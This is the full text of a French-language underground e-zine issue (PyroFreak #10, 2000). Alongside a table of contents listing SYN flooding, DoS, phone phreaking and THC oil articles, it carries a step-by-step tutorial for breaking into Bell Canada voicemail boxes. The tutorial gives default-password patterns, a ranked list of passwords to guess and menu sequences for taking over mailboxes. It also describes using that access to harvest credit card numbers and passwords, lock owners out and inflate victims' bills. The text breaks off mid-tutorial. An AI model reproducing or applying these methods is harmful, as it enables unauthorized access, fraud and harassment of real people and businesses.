'::-::` (o o) ooO--(_)--Ooo- 2000(c) tOUT lES dROITS sONT réSERVÉS à pYROfREAk mAGAZINE -::- Si t'est trop saoul pour marcher!! ben prend ton char!!!! *Ca cé brillant* .----..---'`````'. .` .` `. \ \ ) ___ __ _ _ _____ ______ \ \ / | |\ | |\| |\ | |\ | |\ \.-'``'-...-'``'-./ | ; | | | | | | | | | ; | | , , | x | | | ; | | | : | : | : | : : | ; : | |_: | | | x ; | | x | ; , , | ___/ \| |___ | | | ___| | |_ ____| | .; ;. | |\__\.` \__| | ; | |\ __\| \______\| | ; . ; | |_| | |_| | |_: | ;\ \ -._____/ \_____.- / \_\| \_\| \_\|_| | .10.ten. : \_x.' \`.x_/ : \_\| `. (._.) .' xxxxxxx. xxxxxx. xxxxxx. xxxxxxx. xxx. x. ( \ / ) xxx. xxx. xx. xxx. xxx. x. xxx. x. \ \ ....--. / / xxxxxx. xxxxxx. xxxxxx. xxxxxxx. xxxxx. .) \ /).---._\ / xxx. xxx. x. xxx. xxx. x. xxx. x. (. // / xxx. xxx. x. xxx. xxx. x. xxx. x. ) //`--._.--' xxx. xxx. x. xxxxxx. xxx. x. xxx. x. (`` Crédit: __2 29 Mars 2000 Vous devez lire ceci avant d'aller plus loin: __________________________________________________________________________ |********************************DISCLAMER********************************| | | |Pyrofreakmag (et ses membres) tient à avertir les gens qui vont continuer| |à lire le texte qui va suivre qu' ont n'est aucunement responsables | |des actes, et même des pensées qui pourraient être produites par les | |lecteurs de ce zine par rapport à nos articles . Nous tenons à mettre | |cela bien au clair. Si vous n'êtes pas d'accord avec cette affirmation, | |fermez ce texte et effacer le de votre disque dur ou sur tout autres | |disques. Vous êtes le seul responsable de vos actes. | |Message s'adressant à la GRC: Si un article est dans l'illégalité, seul | |son auteur peut-être tenu responsable et non le groupe PYROFREAK en | |entier. Pas de poursuite, cé ca que ca veux dire simplement! Donc, vener | |pas nous faire chier!!!! | | | |NB: On considère ce magazine comme étant légal, si vous pensez qu'il ne | |l'est pas, continuer pas à lire ce qui suit! | | | | | |Plusieurs personnes nous on posé cette question: Pourquoi vous faite ce | |Magazine? Heh bien, j'ai la réponse à vous. C'est seulement pour démon- | |trer que certains systèmes ou compagnies, sont merdiques par rapport à un| |sujet en particulier, le but de ce magazine, est seulement de les faire | |réagir à la situation, pour qu'ils arrangent leur faille le plus rapide- | |ment possible. Donc, ont est la pour vous aider les compagnies. | |_________________________________________________________________________| =========================================================================== Comment nous rejoindre?: Voici les moyens de rejoindre les membres et COLLABORATEURS (De ce numéro) de Pyrofreak. Pour avoir la liste complète, aller sur le site web (www.PyroFreak.org) dans la section membres & cie. Soit par IRC, sur #PyroFreak, via le serveur undernet. --------------------------------------------------------------------------- Soit par e-mail: Pour rejoindre PyroFreak: pyrofreakmag@hotmail.com Pour rejoindre le WEBMASTER [-DaRK-]: webmaster@pyrofreak.org Pour rejoindre Neuro: neuro@pyrofreak.org Pour rejoindre endrix: lordendrix@hotmail.com Pour rejoindre Cyberrider: cyberride@hotmail.com Pour rejoindre [ewoks]: ewoks@pyrofreak.org Pour rejoindre tekrebel: tekrebel@vl.videotron.ca Pour rejoindre Psykaos: shurikenbest@hotmail.com Pour rejoindre [G]r4FX: DarkM0nk@rocketmail.com Pour rejoindre NuCleaR: nuclear@pyrofreak.org Pour rejoindre Pilate: pilate@pyrofreak.org Pour rejoindre Oculair: oculair@pyrofreak.org Pour rejoindre PaToFF: patoff22@hotmail.com Pour rejoindre LeMarquis: lemarquiz@yahoo.com Pour rejoindre BenCode: syst3m@pyrofreak.org Pour rejoindre Karyu: Karyu@pyrofreak.org Pour rejoindre Vip0|a: vipola@pyrofreak.org Pour rejoindre Svaik: svaik@biosys.net Pour rejoindre Cyberdollar: cyberdollar@caramail.com Pour rejoindre Putois: asmbeginer@multimania.com Pour rejoindre Mastermind: anakin_vador@hotmail.com Pour rejoindre KAiAPhAS: goth.goth@caramail.com Pour rejoindre zorgon: zorgon@sdf.lonestar.org Pour rejoindre Sabrina: sabrina@inorbit.com ++++++++++++++++++++++++++++ --------------------------------------------------------------------------- Venez visiter notre site web: - http://www.pyrofreak.org : Le site à été complètemet refait, aller voir ca! Vous pouvez nous laisser un(e) message/critique ou poser une question sur notre wwwboard sur le site (Section Contact). GÊNER VOUS PAS, on a pas l'habitude de rire des gens:)! Si vous voulez etre informé des changements sur le site de PyroFreak, des dates de sortie de magazine, etc... Aller vous abonez a la Mailing List de PyroFreak sur le site, encore dans la section contact. ___________________________________________________________________________ |Si vous voulez qu'un de vos articles paraisse dans le #11, envoyez le à | |pyrofreakmag@hotmail.com .(Les articles envoyés les en .txt ou .rtf SVP!) | |SVP, essayer de vous forcez pour les fautes d'orthographe et la mise en | |page (Pas de retour a la ligne automatique SVP). Ou si vous avez des ques-| |tions ou commentaires, envoyez les aussi à pyrofreakmag@hotmail.com . | |__________________________________________________________________________| Sujets D'articles proposés: -Logs de scan 1-800 ou autres -Explication de nouveaux type de Vmb ou Pbx -Critiques de divers programmes se rapportant a l'underground -Informations intéressantes sur les cellulaires ou pagettes (Tatoo) -Informations intéressantes sur un type de fraudage -Technique de hack particulières -Anecdote particulière -Programmation intéressante pour L'underground -Etc, utilisez votre imagination! ____ __ _ _ _______________ ________ ________ __PyroFreak Magazine #10 : | TABLE DES MATIERES '.________ __ __ ___________ ____ ______________ ____ ___ ______ __ __ ____________________________________________________________________________ |# Titre de l'article Auteur de l'article | |___________________________________________________________________________| |1- Intro | Neuro | |2- Tutorial Sur les Messageries TéléRéponse de Bell Canada | Neuro | |3- L'utopie du portscan | LeMarquis | |4- Le SYN flooding | Endrix | |5- Certains code régionaux de Bell&Cantel | Endrix | |6- La GRC introduite par un anonyme | LeMarquis | |7- Alladvantage | [ewoks] & | | | Svaik | |8- Fréquences (The Recueil) | PaToFF | |8-1 Fréquences plus ou moins légal pour les Francais | Cyberdollar | |9- Vb5 Tutorial.. | Vip0|a | |10- Fabrication d'huile de THC | Neuro | |11- Les secrets d'Eggdrop enfin dévoilés | LeMarquis | |12- Internet Outdial | LeMarquis | |13- Beige Boxing - Que se cache t'il sous les plaques | | | FUCK TELECOM (Pour les Français)| Cyberdollar | |14- Encryption RSA | Sabrina | |15- Autres éléments sur l'emetteur télé du #9 | Cyberdollar | |16- Le PATATOR | Mastermind | |17- NetAppGuard | KAiAPhAS | |18- Trashing Report | endrix | |19- DoS, wtfit (what the fuck is that)? | Tekrebel | |20- Initiation au C sous linux | Putois | |21- sCAN pAR eNDRIX | endrix | |22- Faire chier un trou du cul à la éleet | Tekrebel | |23- Exploit altavista et Cash bar | Cyberrider | |24- ISOm \\'aReZ & MP3 (Partie 3) | Vip0|a | |25- Decryptage des comptes de Cashsurfers | zorgon | |26- Un peu de tout et de rien mais sourtout de moi | endrix | |27- Les nouvelles en Vrac | | |28- Conclusion | Neuro | |_____________________________________________________________|_____________| NB:Le mag est corriger de facon a éliminer les fautes d'orthographe grandioses, donc désoler si y'a des incovénients. (Dépendant des articles). Raison: Sa gruge beaucoup trop de temps. ********************************************************************** * Pièces Jointes dans le .zip de ce numéro de PyroFreak * * * * Pyrofreak10*.*: Le document que vous lisez en ce moment * * Exercice1_1.gif: Image, se référer à l'article #9 * * Exercice1_2.gif: Image, se référer à l'article #9 * * Exercice1_6.gif: Image, se référer à l'article #9 * * Exercice1_7.gif: Image, se référer à l'article #9 * * Exercice1_8.gif: Image, se référer à l'article #9 * * Image1.gif Image, se référer à l'article #14 * * Image2.gif Image, se référer à l'article #14 * * Image3.gif Image, se référer à l'article #14 * * Image4.gif Image, se référer à l'article #14 * * pyrobottin.txt: PyroBottin * * code.pyro: Code Régional du Quebec * ********************************************************************** ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 : | 1-Intro '.________Email: neuro@pyrofreak.org ______________ ____Par Neuro __ __ Salut peuple de la terre. Comme vous avez peut-être pu le constater, vous lisez présentement le #10 de PyroFreak. Ce #10 coincide justement avec notre 1er anniversaire d'existance, depuis le début de notre premier magazine datant de Février 1999. Donc, si vous nous suivez depuis notre début, on est très reconnaisant à votre égard, ou même si vous venez juste de connaître le magazine. Donc, on vous dis un gros MERCI. Un merci aussi pour les critiques très abondantes de notre dernier numéro (#9). Celui-ci a été critiqué de façon général comme étant un numéro de qualité, bref nous allons voir si cela va se répété dans ce numéro. Aussi, désoler pour le retard de ce numéro, un manque de temps important en est la cause. Pour terminer, Bonne lecture! >>-Site Web: www.PyroFreak.org Toujours Updater tres régulièrement, et surtout que le site à été complètement refait! ALLER VOUS INSCRIRE A LA Mailing list, dans la section contact. Il y a aussi le PyroBottin qui s'avère assez populaire, donc, si vous voulez vous procurer les prochaines versions de celui-ci, qui est updater très régulièrement, et bien vous pouvez vous le procurer dans les textes onlines sur le site. J'ai cru bon de joindre la version la plus récente du PyroBottin dans le .zip de ce numéro, aller y jeter un coup d'oeil. En passant une version francaise (France) serais très pratique, pour les intéressés qui se demande quoi faire pour participer à PyroFreak, voila un bon moyen. Key PGP pour PyroFreak: Voici notre key Public: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 6.5.1 for non-commercial use mQGiBDgw03sRBADUCExTODf2IU4T4aC4FzlT3NysmGX4RsuhcFrP6H2jkSd08jXa HwMQIBqFPRdSsHcNiypeOm/69okv9qCG6TpCvLQZ24GnlSIwsgYAH9sJ+ONnDD9b XHGbkVTMQZTxXbr//pbWOtHTQuHF0xp9u1Q4G6ulxSAKUNdKqrJBL7v62QCg/ycI lllyi2hxvucdG5o03BA02CEEAJ5xfuRZA2MVPN+9oO5blMwXO+0rmoiK14maFgVy 7LB4hg1leOQFf2Nq3FpcrgrkxCvG47panSLTVQaEPZsmk5S5SpDhPxhzR+Hn4bBy /+va5/NWNEb2DCr7M8NN75Kel7PtGGCKJm6wOzI72N01Trw4rKM5OqCbXoe4YcPO 9DtiBAC8b29F5wUT+Zt0qfPiyhTOMftf7AnclDMYDIk8UoqV0a6GLaDHpjilOjif 1otqX5JARYfCYb8bbwvfFFAz/yqPNX5xpzFChD5QKciZ+IbXdYHi3S1rh0vMgLTp GwqL1aoNcW06cBK3/TdPwNTZaMxmW7zMEYLoKH/h7yDpXIa3erQtUHlyb2ZyZWFr IE1hZ2F6aW5lIDxweXJvZnJlYWttYWdAaG90bWFpbC5jb20+iQBMBBARAgAMBQI4 MNN7AgsCAhkBAAoJEJVPLe3+WRwP15IAn1o1cstpxi5uAFk1UQ8PmzvvokZfAKD7 S1ZzoBO/fFf5QIPEY2+b3xTPzrkCDQQ4MNN8EAgA9kJXtwh/CBdyorrWqULzBej5 UxE5T7bxbrlLOCDaAadWoxTpj0BV89AHxstDqZSt90xkhkn4DIO9ZekX1KHTUPj1 WV/cdlJPPT2N286Z4VeSWc39uK50T8X8dryDxUcwYc58yWb/Ffm7/ZFexwGq01ue jaClcjrUGvC/RgBYK+X0iP1YTknbzSC0neSRBzZrM2w4DUUdD3yIsxx8Wy2O9vPJ I8BD8KVbGI2Ou1WMuF040zT9fBdXQ6MdGGzeMyEstSr/POGxKUAYEY18hKcKctaG xAMZyAcpesqVDNmWn6vQClCbAkbTCD1mpF1Bn5x8vYlLIhkmuquiXsNV6TILOwAC AggA3CvCaWUTeC9zxao9AoDJJfzUKLhib4nNR1C0+MNTDGeKKKLSQQLOobQKk4Ao Pr3Jqe/19p2aJYUu9Ma7r5GwK4hiH4sIGMlDJUprD7Nvr7/5WiKX7IQ+NNMk09RJ TvFp+b5N5t5rQjGUfkRbWrIZcGLpo+qpL4NNimYG1MbTVqEb4GRSZXz0shY9sWu+ W3g/OuSXcIOXxJiXTmICmXIDOWRdACxngF1FBT802wBEOIu/VR9j6DtVpL8+vx+3 tPI6/Spy+ZadRD4+5hComuXTNzUiI0mcvG2WTqcOAJyuvRFm3ky7xzO6MWlie+Zg hBDENiqy6zRrWYN6mu1NZHZaWYkARgQYEQIABgUCODDTfAAKCRCVTy3t/lkcDx7v AJ45rAXK/NeWmwezmE+CGMEZYzJoxQCgsOgyc66kWIRJ2K/WIGgOIq4M3wo= =QSdb -----END PGP PUBLIC KEY BLOCK----- News pour PyroFreak #10 -- Les médias sont fous! Note de Neuro: Le monde m'ont trouvé "sans scrupule" d'accorder un entrevu au Journal de Montréal et a L'émmission de TV Branché, et bien vous aviez raison, je suis con et j'ai eu tord! Linux Slackware 7 bug report Par Endrix ============================ Il y a un problème dans le pppd de linux slackware 7. Sur beaucoup de machine, il n'est pas fonctionnant alors vous devez aller downloader un fix sur le serveur ftp.cdrom.com (ftp://ftp.cdrom.com/pub/linux/slackware-7.0/slakware/n7/tcpip2.tgz) Merci! fbasoft@yahoo.com +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++Annonces et Offres+++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Si vous distribuez notre magazine sur votre site, ou si vous avez un lien vers notre site, faîte nous le savoir par e-mail: pyrofreakmag@hotmail.com Ca va nous faire un grand plaisir d'annoncer votre site (Si celui en vaut le coup) dans le prochain numéro de PyroFreak ou sur notre site, qui surement fera monter le nombre de visiteurs sur votre site. NB: J'ai bien dis si le site en vaut le coup. Cours sur notre Channel Irc #PyroFreak (Undernet) J'aimerais souligné que durant le prochain mois, plusieurs cours vont etre donnés sur notre channel IRC, dont soyez y! Ils vont être annoncés dans le topic du chanel. On recherche des gens qui serais intéressés à donner un ou plusieurs cours sur notre channel, d'un sujet divers traitant de l'underground. Que ca soit un cours pour montrer une technique de fumage de weed, ou une tech- nique sur le "piratage" téléphonique, peu importe, autant que ca soit pas trop du déja vu. Si ya des intéressés, venez nous visiter sur notre channel IRC , #PyroFreak ! (Autant Francais que Quebecois). PyroFreak recherche de bons codeurs, soit en Win ou en Linux/Unix, donc si vous êtes intéressé à vous impliquez dans PyroFreak, et que vous avez de bonnes connaisances en programmation, contacter nous a: pyrofreakmag@hotmail.com Et on vous donnera plus d'informations sur le sujet. On recherche aussi quelqu'un qui pourrais nous trouver de bons arti- cles de journaux récents, si vous voulez un exemple de ce que nous parlons, aller lire la section Nouvelles en vrac a la fin de ce magazine. PyroFreakmag@hotmail.com ___________________________________________________________________________ ___________________________________________________________________________ |Si vous voulez qu'un de vos articles paraisse dans le #11, envoyez le à | |pyrofreakmag@hotmail.com . Ou si vous avez des questions ou commentaires, | |envoyez les aussi a pyrofreakmag@hotmail.com . | |__________________________________________________________________________| +-------------------------+ , , , , , , , , |+-----------------------+| , , , , , , , ||+---------------------+||, .____. , , , , , , , |||| |||| , | :| , , , , |||| J'en ai plein |||| __|====|__ |||||| , , , , |||| mon cul de ||||* / o o \ ||||||, , , , , |||| cette cris |||| * | -= | \====/ , , , , , |||| de saison |||| _U==\__//__. \\// +---------------------+ |||| de cul ||||/ / \\==// \ \ || , |+-------------------+| |||| |||| | o || | \|| ,|| !!! PyroFreak !!! || |||| ||||/| o "" |\_|B), |+-------------------+| |||| CALIS D'HIVERS ||||, \__ --__/ || , +---------------------+ ||+---------------------+|| / \ ||, , , , , , , |+-----------------------+|| | || , , , , , , +-------------------------+| | || , , , , , , , ------_____---------____---\__________/__||__---------________PsYkAoS ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10 | 2-Tutorial Sur les Messageries TéléRéponse de Bell Canada |(X) Phreak ( ) Hack ( ) Autres '.__________Par Neuro________ ________ neuro@pyrofreak.org ______ ___ Bonjour, le texte qui va suivre sera utile particulièrement aux Québecois, mais celui-ci peut quand même être utile pour toute personnes habitant l'Amérique Du Nord (Voir plus bas pour plus d'info). Ce document s'adresse autant pour les débutants en matière de Phreak que tout autres personnes ayant de la connaisance dans le domaine. J'ai essayer de faire un document le plus complet possible sur le service TéléRéponse, à vous de voir si c'est réussi. Avant de continuer à lire ce document, vous devez lire ceci: _--AVERTISSEMENT--_ Je tiens à avertir les gens qui vont continuer à lire ce texte, Que je suis en aucun cas, responsable des actes, et même des pensées qui pourraient être produites par les lecteurs de ce texte. Je tiens à mettre cela bien au clair. Si vous n'êtes pas d'accord avec cette affirmation arrêter de lire ce docu- ment dès maintenant et effacer le de votre disque dur ou sur tout autres disques. Vous êtes le seul responsable de vos actes. Prener çe texte comme étant seulement à but théorique. *+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+* *+ 1- Informations générales sur le service TéléRéponse de Bell Canada. +* *+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+* Voici la publicité que Bell Canada fait de son service de TéléRéponse: -Ne manquez plus un seul appel. Le service TéléRéponse prend vos messages quand vous utilisez votre téléphone ou Internet ou si vous êtes éloigné du téléphone. -Ce service prend jusqu'à trois messages en même temps. -Il est invisible. Vous n'avez plus à vous occuper des bandes ou des câbles. Et il ne prend pas de place. -Il est fiable. Le service TéléRéponse continue de fonctionner, même en cas de panne d'électricité. Il enregistre aussi l'heure et la date de chaque message. -Il est pratique. Récupérez et gérez vos messages depuis tout téléphone à clavier, 24 heures sur 24. -Conserver jusqu'à 25 messages. -Recevoir des messages atteignant 3 minutes et de les sauvegarder pendant 7 jours. -Accueillir les appelants avec un message de 30 secondes (Greeting). -Sauvegarder les messages non écoutés pendant 21 jours. -Le service TéléRéponse Requière Oubligatoirement un service Touch-Tone. ******************************** *** Paiement à l'utilisation *** ************************************************************************* **-Envoyer un message à un groupe : jusqu'à 5 listes de 15 numéros. ** ** ** **-Envoyer des messages à d'autres abonnés des services TéléRéponse ou ** ** TéléRéponse Plus, sans que leur téléphone sonne. ** ** ** **-Envoyer 5 messages jusqu'à 30 jours d'avance. ** ** ** **-Envoyez des messages à n'importe qui, n'importe quand, n'importe où!** ** ** ** La Messagerie Universelle est un service payable à l'utilisation. ** ** Des frais sont exigibles pour chaque message que vous envoyez, ** ** faites suivre ou auquel vous répondez: ** ** ** ** -0,15$ par message au Québec ** ** -0,40$ par message à l'extérieur du Québec (à l'interieur du Canada)** ** -1,50$ par message aux États-Unis ** ** -2,50$ par message Outre-mer ** ************************************************************************* ***************************** * Abonnement Supplémentaire * ***************************** Centre de messages intégré -Regroupez tous vos téléphones dans une seule boîte vocale. Vous pouvez relier les téléphones de votre domicile ou de votre bureau, ainsi que votre téléphone cellulaire Bell MobilitéMC à une seule boîte vocale : vous n'aurez ainsi plus qu'un seul mot de passe, un seul message d'ac- cueil et un seul point de vérification des messages. Option Téléavertisseur -Avez-vous un téléavertisseur? Votre boîte vocale peut appeler automati- quement votre téléavertisseur quand vous avez des nouveaux messages. Aide pour le service TéléRéponse: 1-800-361-9844 *+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+* *+ 2- Utilités de ce système pour nous les Phreakers. +* *+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+* Évidemment qui à une et même plusieurs utilités à hacker ce type de système, sinon j'aurais pas écrit ce tutorial. *+Première Utilité+* L'utilité qui va suivre peut jouer un rôle très important lorsque vous voulez avoir de l'information sur quelqu'un ou sur une entreprise en particulier. Je vois plus un intéret pour un entreprise, mais bon, les 2 peuvent quand même être utilent. Voici des exemples de types de messages qu'on peut retrouver sur un système de TéléRéponse d'entreprise. -George, Ici Carole, je voulais juste te dire que j'ai déposé les 200$ comme prévu dans votre boîte à mail à côter de votre porte pour les employés, rappel moi au XXX-XXXX pour confirmer si ta bien reçu le montant. -George, Ici Carole, voici mon numéro de carte de crédit: 4551XXXXXXXXXXXX XX/XX . Avec cela tu va pouvoir passer la commande que je désirais plus tot, vu que je pars en voyage aujourd'hui et que vous êtes fermé. -George, Ici Carole, je voulais juste te dire que j'ai trouvé une super aubaine pour les sifflets rose au 456 rue Des Érables. -George, Ici Carole, j'ai trés hâte qu'on baise comme des bêtes, je t'aime. À demain. -George, Ici Carole, je voulais juste te dire que j'ai changer la combinaison de l'entrer de l'usine, le nouveau est XX-XX-XX. Salut. (Ça pourais biensûr être un nouveau mot de passe du réseau informatique de l'entreprise) -George, Ici Carole, je voulais te dire que le site Web de la compagnie est complété. Donc, si tu veux rajouter de l'informations par toi-même, voici les informations nécessaires: Host: XXXXXXXXXX Login: XXXXX Pass: XXXXX Salut. --George, Ici Carole, je voulais te dire que si tu désire faire des appels intérurbains, bien voici le numéro (PBX) à composer avant ceux-ci: XXXXXXXXXXXXXXX Pour ceux qui doute qu'on peut entendre des messages comme ceux-ci , vous resteriez très très surpris. Même que plusieurs exemples la dedans me sont déja arrivé personnelement. Donc, ça peut être très utile d'avoir accès à la Boîte Vocale pour ce type d'informations. Evidemment les Boîtes Vocales de résidence sont beaucoup moins intéressantes. C'est pourquoi que je doute que ca soit intéressant de les hacker pour espérer avoir de bonnes informations, à moins biensûr que ça soit la résidence d'un Président d'une compagnie, ou quelque chose comme ca. *+Deuxième Utilité+* L'utilité qui va suivre est plus ou moins intéressante. Il s'agit de faire chier le propriétaire de la Boîte Vocale et du même coup, faire chier Bell. Je vous explique le principe avec une petite exemple. Vous connaissez un magasin ou il vend des pièces d'ordinateurs beaucoup plus cher que le prix habituel, et cela vous chôque. Donc c'est pourquoi que vous avez envis de revendiquer cela. C'est alors que vous décidez de hacker (Voir plus bas dans ce texte pour avoir le coté pratique) la Boîte Vocale de la compagnie en question. Cela, en changeant le message d'intro de la Boîte Vocale. Quand je parle de message d'intro (Greeting), je parle du message que vous entendez lorsque vous appeler sur un répondeur qui est souvent du type: "Bonjour, Johanne et Solange sont pas la pour le moment, laisser votre message après le son du timbre sonore.". Donc, quand vous le changer, vous pouvez en profiter pour faire passer un message du style: -Aller magasiner au commerce X à place de celui-ci, si vous voulez avoir de meileurs prix. Tel: XXX-XXXX Adresse: XXX Xxxxxxx. -Vous vous faîte crosser à acheter dans le commerce que vous appelez en ce moment. Pour changer le message d'intro une fois rendu dans le menu principal, tapper les chiffres suivants en ordre:( 4-3-1 ) Il ne vous reste plus qu'à suivre les instructions. Bref, vous voyez le type de message que je parle. Bon deu- xièment, pour que vôtre message d'intro reste le plus longtemps pos- sible, vous devez aussi changer le mot de passe de la Boîte Vocale. Donc, pour que le propriétaire peuvent reavoir accès à ca Boîte Vo- cale, il devra appeler Bell, pour que ceux-ci remette à zero ça Boîte Vocale. Donc, en remettant à zéro la Boîte Vocale, le propriétaire de celle-ci perd tous les messages qui pouvaient avoir sur celle-ci. Autant les archivés que les nouveaux messages. Donc, ca peux le faire vraiment chier. Pour changer le mot de passe une fois rendu dans le menu principal, tapper les chiffres suivants en ordre:( 4-2-1 ) Il ne vous reste plus qu'à suivre les instructions. Troisième chose à faire, mais qui n'est pas nécessaire, est de changer le nom de l'usager de la box. Pourquoi? Et bien je vous explique cela. Quand le propriétaire de la Boîte Vocale va se rendre compte que son message d'intro à été modifier de façon à lui faire perdre de l'argent ou à lui nuire, il va se grouiller le cul pour aller le remodifier. Donc, quand il va faire '*98' de son téléphone pour accéder à ça Boîte Vocale et que ca va dire exemple : Bonjour "Mr. Du con", entrer votre mot de passe. Quand ca va faire 3 echecs infructueux, y va virer fou en cris avec Mr. Du con. Pour changer le nom d'usagé une fois rendu dans le menu principal, tapper les chiffres suivants en ordre:( 4-3-2 ) Il ne vous reste plus qu'à suivre les instructions. *+Troisième Utilité+* Il s'agit de faire chier une personne en particulier, ou une entre- prise de façon à faire monter ca facture à la fin du mois. Vous allez me dire comment?. Heh bien, rien de plus simple. Je sais pas si vous avez remarquer qu'au début de ce tutorial l'entête *Paiement à l'utilisation*. Donc, si vous passer 15 messages outre-mer à 2,50$ chacun, ca commence a faire pas mal chier. Mais biensûr, si vous exagérer sur le montant, Bell va se douter que la personne dit la vérité quand elle dit qu'elle n'a pas fais ces Frais. Donc soyez tout de même résonnable. *+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+* *+ 3- Comment hacker le systeme TéléRéponse de Bell Canada +* *+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+* 3-a)*-*Comment accéder au service TéléRéponse: *-* *-A partir de votre domicile: 1-Composez *98 2-Vous entendrez votre nom ou numéro préenregistré 3-Composez votre mot de passe *-A partir de l'extérieur vers la Boîte Vocale du Numéro Composé 1-Composez votre numéro de téléphone 2-Appuyer sur 9 des le début de votre message d'accueil 5-Composez votre mot de passe suivi du # *-A partir de l'extérieur vers n'importe quel Boîte Vocale Téléréponse, il faut juste accéder au message d'accueil d'une Boîte Vocale TéléRéponse. 1-Composez votre numéro de téléphone 2-appuyer sur * des le début de votre message d'accueil 3-Ensuite 1 pour Francais ou 2 pour Anglais 4-Appuyer sur # 5-Composer le numéro de téléphone ou la Boîte Vocale se situe avec le code régional (XXX-XXX-XXXX) 5-Composez votre mot de passe suivi du # *********************** *************** ********* 3-b)*-*Mot de passe par défaut*-* Lorsque vous activez une Messagerie Téléréponse de Bell Canada. Celle-ci est assigné par un mot de passe par défaut, qui est du même type sur tout les TéléRéponse à leur démarage. Exemple: Le numéro de téléphone ou le service de TéléRéponse est installé est: 1-514-254-6767 , et bien le password dans ce cas-ci sera: 2546767 Donc, pour les gens un peu moins vite, voici un deuxième exemple:) Tel: 1-819-435-4832 Mot de passe: 4354832 C'est pas plus compliqué que ca. Passons maintenant à un étape trés importante, il s'agit des mots de passe par défaut les plus utilisés. Parce que, comme vous vous en doutez surement, c'est assez rare que l'usager de la Boîte Vocale laisse le meme password qu'à l'origine, vu que Bell les incitent à changer le mot de passe quand il accède pour la première fois à leur Boîte Vocale. Donc voici les mots de passe par défaut, qui sont comme étant très très populaire. J'estime qu'avec ceux-ci vous pouvez hacker 30-40% des systèmes (En ce jour du 6 Janvier 2000), parce qu'après la sortie de ce texte, Bell va surement esssayer de contrer le probleme en incitant d'avantage sur un mot de passe plus sécuritaire. Donc voici les mots de passe à essayer en ordre. Exemple: Le numéro de téléphone de la Boîte Vocale est: 1-514-329-4363 Password Par défaut: 4363 3294363 1234 94363 12345 01234 0000 9999 5143294363 Les mots de passe doivent être situé entre 4 et 15 chiffres pour le service TéléRéponse. Après 3 tentatives d'accès au service TéléRéponse infructueux, le service te déconnecte. Ce qui est bien avec le service TéléRéponse, c'est que si vous avec 3 echecs de suite avec le mot de passe, et bien l'opérateur ne le sera jamais. C'est pas comme les systemes (Audix, Message Center et cie) qui après 3 echecs pour trouver le bon mot de passe, envois un message a l'opérateur dans sa Boîte Vocale lui disant que la Boîte Vocale à eu 3 tentatives de Mot de Passe invalide. *********************** *************** ********* 3-c)*-*Les Étapes pour accéder au menu à partir d'une autre Boîte Vocale*-* -Vous composez le numéro de téléphone qui à une Boîte Vocale TéléRéponse, mais pas nécessairement celle que vous voulez hacker. -Attender que le message d'intro débute, et appuyer sur * "Bienvenue au service TéléRéponse de Bell Canada" "Si vous désirez des instructions vocale en français, veuiller appuyer sur 1.." -Appuyer sur 1 "Si vous disposer d'une boîte vocale dans ce systeme, appuyer sur le # et composer votre numéro de téléphone, précédé de l'indicatif régional ou encore, composer à nouveau les 10 chiffres du # de la personne que vous désirer appeler" -Appuyer sur # "Le numéro de la Boîte Vocale svp" -Composer le numéro de téléphone avec le code régional de la Boîte Vocale à hacker. "Veuiller composer votre mot de passe" -Composer le mot de passe suivi du # ***À ce point, vous avez accès au Menu*** *********************** *************** ********* 3-d)*-*Les Étapes pour accéder au menu d'une Boîte Vocale à partir de son numéro d'origine*-* -Vous composez le numéro de téléphone qui à la Boîte Vocale à hacker -Attender que le message d'intro débute, et appuyer sur 9 "Veuiller composer votre mot de passe" -Composer le mot de passe suivi du # ***À ce point, vous avez accès au Menu*** 3-e)*-*Vous trouvez un message intéressant sur la Boîte Vocale hacker, et vous voulez savoir d'ou il provient*-* Si vous trouvez un message sur la Boîte Vocale hacker, et que celui-ci vous semble intéressant, et vous aimeriez savoir de quel numéro il provient. Heh bien, rien de plus simple si la personne qui à envoyé le message n'a pas utilisé le service confidentiel (*67). Écouter le message en question, et ensuite tapper 8 (Pour y répondre), à ce point la, la voix robotisé du système va vous donnez la provenance de l'appel. *+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+* *+ 4- Comment faire pour hacker une Boîte Vocale TéléRéponse même quand +* *+ son propriétaire est présent? +* *+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+* Deux possibilités s'offrent à vous. Si vous possédez vous même un service TéléRéponse, vous n'avez qu'à faire la procédure habituel pour vous connecter à votre Boîte Vocale (*98). Vous allez entendre la phrase suivante: " 'Votre Nom D'usager' veuiller composer votre mot de passe, ou encore appuyer sur '*', si vous avez composé le mauvais numéro de Boîte Vocale". Quand vous entendez cette phrase, vous tappez sur '*', à ce point vous allez entendre: "Le numéro de la Boîte Vocale Svp". C'est a ce moment que vous composez le numéro de la Boîte Vocale de votre cible, qui est le code régional suivi du numéro de téléphone (XXX-XXX-XXXX). Une fois le numéro de la Boîte Vocale composé, vous allez réentendre le message d'origine: "'Nom D'usager de la cible' veuiller composer votre mot de passe" . Quand vous êtes rendu à ce point, vous pouvez encore vous débrancher de la Boîte Vocale que vous êtes en tappant sur '*', mais une fois que vous avez composer un mot de passe, vous ne pouvez plus changer de Boîte Vocale. En tappant sur '*' ca vous déconnecte automati- quement du système. Si vous possèdez pas de service TéléRéponse, heh bien j'ai un moyen pour vous qui est quand même efficace, mais ca vous demande un petit effort. Vous devez trouver un numéro de téléphone d'une résidence ou d'une entreprise muni du service 